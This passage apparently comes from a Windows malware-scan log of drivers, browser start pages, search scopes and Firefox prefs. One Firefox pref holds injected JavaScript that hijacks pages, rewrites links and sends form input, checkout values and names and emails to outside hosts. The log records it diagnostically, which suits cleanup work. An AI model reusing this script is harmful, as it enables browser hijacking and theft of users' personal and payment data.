DRV:64bit: - [2013/08/22 13:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2013/08/22 13:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:64bit: - [2013/08/22 13:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:64bit: - [2013/08/22 13:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2013/08/22 13:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2013/08/22 13:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:64bit: - [2013/08/22 13:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2013/08/22 13:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:64bit: - [2013/08/22 13:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:64bit: - [2013/08/22 13:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2013/08/22 13:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2013/08/22 13:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:64bit: - [2013/08/22 13:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/08/22 13:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:64bit: - [2013/08/22 13:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:64bit: - [2013/08/22 13:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2013/08/22 13:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:64bit: - [2013/08/22 13:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:64bit: - [2013/08/22 13:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2013/08/22 13:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:64bit: - [2013/08/22 13:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:64bit: - [2013/08/22 13:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:64bit: - [2013/08/22 13:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:64bit: - [2013/08/22 13:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:64bit: - [2013/08/22 13:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:64bit: - [2013/08/22 12:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:64bit: - [2013/08/22 12:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:64bit: - [2013/08/22 12:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:64bit: - [2013/08/22 12:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:64bit: - [2013/08/22 12:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:64bit: - [2013/08/22 12:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:64bit: - [2013/08/22 12:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:64bit: - [2013/08/22 12:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:64bit: - [2013/08/22 12:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:64bit: - [2013/08/22 12:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:64bit: - [2013/08/22 12:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:64bit: - [2013/08/22 12:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:64bit: - [2013/08/22 12:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/22 12:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:64bit: - [2013/08/22 12:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/08/22 12:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:64bit: - [2013/08/22 12:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2013/08/22 12:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:64bit: - [2013/08/22 12:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:64bit: - [2013/08/22 12:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:64bit: - [2013/08/22 12:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:64bit: - [2013/08/22 12:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:64bit: - [2013/08/22 09:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:64bit: - [2013/08/15 23:28:42 | 000,830,680 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168)
DRV:64bit: - [2013/08/13 00:25:46 | 000,017,624 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:64bit: - [2013/08/10 01:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:64bit: - [2013/08/07 02:33:40 | 000,590,024 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:64bit: - [2013/07/30 19:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:64bit: - [2013/07/25 20:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:64bit: - [2013/07/22 17:45:58 | 000,020,800 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WirelessButtonDriver64.sys -- (WirelessButtonDriver)
DRV:64bit: - [2013/07/01 21:10:20 | 000,087,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TXEIx64.sys -- (TXEIx64)
DRV:64bit: - [2013/03/05 13:01:42 | 000,091,712 | ---- | M] (CyberLink) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\CLVirtualDrive.sys -- (CLVirtualDrive)
DRV:64bit: - [2013/03/05 07:22:20 | 000,041,408 | ---- | M] (CyberLink Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\clwvd.sys -- (clwvd)
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.uk.msn.com/CQNOT14/2
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://g.uk.msn.com/CQNOT14/2
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...0TR&pc=CPNTDFJS
IE:64bit: - HKLM\..\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}: "URL" = http://www.amazon.co...s={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}: "URL" = http://rover.ebay.co...9550-11896-25/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.uk.msn.com/CQNOT14/2
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://g.uk.msn.com/CQNOT14/2
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...0TR&pc=CPNTDFJS
IE - HKLM\..\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}: "URL" = http://www.amazon.co...s={searchTerms}
IE - HKLM\..\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}: "URL" = http://rover.ebay.co...9550-11896-25/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.uk.msn.com/CQNOT14/2
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,First Home Page = http://g.uk.msn.com/CQNOT14/2
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://uk.search.yah...r=spigot-yhp-ie
IE - HKCU\..\SearchScopes,DefaultScope = {7C53F0B8-083A-47A5-8DEE-FF74C88B5A9A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...0TR&pc=CPNTDFJS
IE - HKCU\..\SearchScopes\{7C53F0B8-083A-47A5-8DEE-FF74C88B5A9A}: "URL" = http://uk.search.yah...p={searchTerms}
IE - HKCU\..\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}: "URL" = http://www.amazon.co...s={searchTerms}
IE - HKCU\..\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}: "URL" = http://rover.ebay.co...9550-11896-25/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.startup.homepage: "www.google.com"
FF - prefs.js..extensions.5GaH.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1){return}}catch(e){};(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax....27054&pid=1&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"Q4BwT86K=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"Q4BwT86K=\")){var d=a.match(/Q4BwT86K=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8znShVWzmPhd97qHsMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0pjUFqjY5qdgHqdr6pjaGqHa8qa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&eid=672&hid=9915884634379027054&pid=1&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&eid=672&hid=9915884634379027054&pid=1&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.developpro.info/?pr=1&d=\"+video_id+\"&s=\"+document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=\"+h+\"&s=\"+p}\"justeat.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"checkout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=titbit.com&s=0\";\"www.grubhub.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"payment\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.grubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.delivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.foodler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=eat24hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\[email protected]]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$t